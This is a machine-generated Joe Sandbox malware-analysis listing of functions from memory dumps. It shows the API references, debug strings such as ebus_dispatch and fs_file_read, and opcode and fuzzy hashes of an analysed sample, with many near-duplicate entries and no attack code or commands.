Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_keepalive
API String ID: 1729277954-536111009
Opcode ID: 4ad06e24566ab5c6bb557166195a17081ad8b158e8741c27b0cf817f8edb379d
Instruction ID: 3726a9c535666e0533cdf7107f72d3e11260143f00712b0bb80ee15ef3cace5a
Opcode Fuzzy Hash: 4ad06e24566ab5c6bb557166195a17081ad8b158e8741c27b0cf817f8edb379d
Instruction Fuzzy Hash: 9AF0F675B1C94286F3109B57B8000766660BF86BB0F1082F7E92D837B0DE3CC40A8B00

Function 00007FFE1A52B132 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 72stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FFE1A52B16B
strchr.MSVCRT ref: 00007FFE1A52B1B7

Strings

sam3_recv_rsp, xrefs: 00007FFE1A52B1D1
[D] (%s) -> %s, xrefs: 00007FFE1A52B1D8

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: memsetstrchr
String ID: [D] (%s) -> %s$sam3_recv_rsp
API String ID: 2564583029-4292814133
Opcode ID: facf68638d95ea0b2cf81ef83f61a81e48f368a89084a7acc5880b6f7e308d59
Instruction ID: ba38b4d93f060c460c7ed8b8fa6cd6947ffb4b57afcf54bbde628c09e1876170
Opcode Fuzzy Hash: facf68638d95ea0b2cf81ef83f61a81e48f368a89084a7acc5880b6f7e308d59
Instruction Fuzzy Hash: 2F21C012F0CE8681FA2559AB581437915425F63FB0F1943F3EE7D4B7E2DE2CA8429301

Function 00007FFE11BDA250 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE11BDA289
LeaveCriticalSection.KERNEL32 ref: 00007FFE11BDA30B

Strings

[D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE11BDA2F6
ebus_dispatch, xrefs: 00007FFE11BDA2EF

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
API String ID: 3168844106-1717220914
Opcode ID: ec7771e1e83ac3cc9bd1e3336a2124f394ccde0f83b3c0cf51d2ad677df23565
Instruction ID: e49652d32307f993d978fa17f03f782b7bf2ff3765791be9011a2cc98e613fb0
Opcode Fuzzy Hash: ec7771e1e83ac3cc9bd1e3336a2124f394ccde0f83b3c0cf51d2ad677df23565
Instruction Fuzzy Hash: 58216F32A0CE82C1EB758F27E8809A96768FB54BA8F146175EA8D47774DF3CE941C700

Function 00007FFE1A525F90 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE1A525FC9
LeaveCriticalSection.KERNEL32 ref: 00007FFE1A52604B

Strings

ebus_dispatch, xrefs: 00007FFE1A52602F
[D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE1A526036

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
API String ID: 3168844106-1717220914
Opcode ID: 9900ccb5ce75725bc87be564b36fd8d6d249f1f9900f237f57d57ab2336d1be5
Instruction ID: 27152e25fedd3b812e8258a35652e388219d188561a636ed9370f0413c0acb50
Opcode Fuzzy Hash: 9900ccb5ce75725bc87be564b36fd8d6d249f1f9900f237f57d57ab2336d1be5
Instruction Fuzzy Hash: 4F210722B0CE42C1EB608F66E8801796361EB96FA4F1441B7DA5E87AA4DF2CD855C700

Function 00007FFE11501290 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE115012C9
LeaveCriticalSection.KERNEL32 ref: 00007FFE1150134B

Strings

[D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE11501336
ebus_dispatch, xrefs: 00007FFE1150132F

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
API String ID: 3168844106-1717220914
Opcode ID: c529b84dc2b56fb7c1f4eb8d0b1a959fd8424dc3c1dfaac34978ad256373d367
Instruction ID: 676ea77eddc938206aca4b561e26fb39674ac842e36acd4752b8f978cc12b249
Opcode Fuzzy Hash: c529b84dc2b56fb7c1f4eb8d0b1a959fd8424dc3c1dfaac34978ad256373d367
Instruction Fuzzy Hash: FB215B72A09E4282EB21DF53F88016D7369FB44BA4B144175DA9D87AB8DF3CE892C700

Function 00007FFE11EC1290 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE11EC12C9
LeaveCriticalSection.KERNEL32 ref: 00007FFE11EC134B

Strings

ebus_dispatch, xrefs: 00007FFE11EC132F
[D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE11EC1336

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
API String ID: 3168844106-1717220914
Opcode ID: 7f831e8638b2e21ef89d0a88fef1dfe03948884cf0943f83d1e1e332d764cd1f
Instruction ID: d1802466f999ca27a23f750e49e627106a8b5deefce7c3fd6ad3e9a0a0182231
Opcode Fuzzy Hash: 7f831e8638b2e21ef89d0a88fef1dfe03948884cf0943f83d1e1e332d764cd1f
Instruction Fuzzy Hash: 59215132A08E42C1EB14DF97EC4026A67A8FB45BA4F545275DA5D877B4DF3CE851C700

Function 00007FF7C1AB5280 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 531eddd04ba4df6279567b12e9b44042d35f737912b58bd659f53787c1cb0e98
Instruction ID: 3b8a6eea542fb34637ba83395c3bfe2693cefb54c7e0e495c7ad69bcb0cbdf93
Opcode Fuzzy Hash: 531eddd04ba4df6279567b12e9b44042d35f737912b58bd659f53787c1cb0e98
Instruction Fuzzy Hash: 1CF05E73B0964281FB52FF14B440BBD96421F45376EC90633CD494B6D1AEBDA8869320

Function 00007FF7C1AB5276 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 9d2de69efe56b1c99ae78d64d1b609328d2722557249e32473173a1159c819cd
Instruction ID: 4f32e111606aa669f2e2081493924a6fb41a9fc20d9554670fb8ebc1df17f07d
Opcode Fuzzy Hash: 9d2de69efe56b1c99ae78d64d1b609328d2722557249e32473173a1159c819cd
Instruction Fuzzy Hash: 81F05E73B0964281FB52FF14B440BBD96421F45376EC90633CD494B6D1AEBDA8869320

Function 00007FF7C1AB526C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: d9bc328c2e7b63bb156a7e01eb61a8a2b8ead1ee2ea913901e2332856c61f7bd
Instruction ID: 4f92e826c88e93e41a2c67fa124d3c7b9877c9c340c0a30761b7323073741610
Opcode Fuzzy Hash: d9bc328c2e7b63bb156a7e01eb61a8a2b8ead1ee2ea913901e2332856c61f7bd
Instruction Fuzzy Hash: 1EF05E73B0964281FB52FF14B441BBD96421F45376EC90633CD494B6D1AEBDA8869320

Function 00007FF7C1AB5262 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 00b0b1ba4e8dbb86f78792e9a63b8dad70a0698bfb00e83aba3b21c0b858e065
Instruction ID: 0ba2e7c2a368dc47192e30272ed9ef75a11c50f5095c716f2e1eab9ddf7ac83d
Opcode Fuzzy Hash: 00b0b1ba4e8dbb86f78792e9a63b8dad70a0698bfb00e83aba3b21c0b858e065
Instruction Fuzzy Hash: 27F05E73B0964681FB52FF14B450BBD96421F45376EC90633CD494B6D1AEBDA8869320

Function 00007FF7C1AB5258 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: bc7aacda62b4ea1fd89abae9408600b20ec1f693edfd2ccf07a2e231a536cb80
Instruction ID: 4295d770f716c68aa56fcb040638fa6a4903ad00b568e54ce1404830b31cd558
Opcode Fuzzy Hash: bc7aacda62b4ea1fd89abae9408600b20ec1f693edfd2ccf07a2e231a536cb80
Instruction Fuzzy Hash: 3EF05E73B0964281FB52FF14B440BBD96422F45376EC90633CD494B6D1AEBDA8869320

Function 00007FF7C1AB51C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 531eddd04ba4df6279567b12e9b44042d35f737912b58bd659f53787c1cb0e98
Instruction ID: 3b8a6eea542fb34637ba83395c3bfe2693cefb54c7e0e495c7ad69bcb0cbdf93
Opcode Fuzzy Hash: 531eddd04ba4df6279567b12e9b44042d35f737912b58bd659f53787c1cb0e98
Instruction Fuzzy Hash: 1CF05E73B0964281FB52FF14B440BBD96421F45376EC90633CD494B6D1AEBDA8869320

Function 00007FF7C1AB51B6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 9d2de69efe56b1c99ae78d64d1b609328d2722557249e32473173a1159c819cd
Instruction ID: 4f32e111606aa669f2e2081493924a6fb41a9fc20d9554670fb8ebc1df17f07d
Opcode Fuzzy Hash: 9d2de69efe56b1c99ae78d64d1b609328d2722557249e32473173a1159c819cd
Instruction Fuzzy Hash: 81F05E73B0964281FB52FF14B440BBD96421F45376EC90633CD494B6D1AEBDA8869320

Function 00007FF7C1AB51AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: d9bc328c2e7b63bb156a7e01eb61a8a2b8ead1ee2ea913901e2332856c61f7bd
Instruction ID: 4f92e826c88e93e41a2c67fa124d3c7b9877c9c340c0a30761b7323073741610
Opcode Fuzzy Hash: d9bc328c2e7b63bb156a7e01eb61a8a2b8ead1ee2ea913901e2332856c61f7bd
Instruction Fuzzy Hash: 1EF05E73B0964281FB52FF14B441BBD96421F45376EC90633CD494B6D1AEBDA8869320

Function 00007FF7C1AB51A2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 00b0b1ba4e8dbb86f78792e9a63b8dad70a0698bfb00e83aba3b21c0b858e065
Instruction ID: 0ba2e7c2a368dc47192e30272ed9ef75a11c50f5095c716f2e1eab9ddf7ac83d
Opcode Fuzzy Hash: 00b0b1ba4e8dbb86f78792e9a63b8dad70a0698bfb00e83aba3b21c0b858e065
Instruction Fuzzy Hash: 27F05E73B0964681FB52FF14B450BBD96421F45376EC90633CD494B6D1AEBDA8869320

Function 00007FF7C1AB5198 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: bc7aacda62b4ea1fd89abae9408600b20ec1f693edfd2ccf07a2e231a536cb80
Instruction ID: 4295d770f716c68aa56fcb040638fa6a4903ad00b568e54ce1404830b31cd558
Opcode Fuzzy Hash: bc7aacda62b4ea1fd89abae9408600b20ec1f693edfd2ccf07a2e231a536cb80
Instruction Fuzzy Hash: 3EF05E73B0964281FB52FF14B440BBD96422F45376EC90633CD494B6D1AEBDA8869320

Function 00007FF7C1AB514D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

fs_file_read, xrefs: 00007FF7C1AB5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

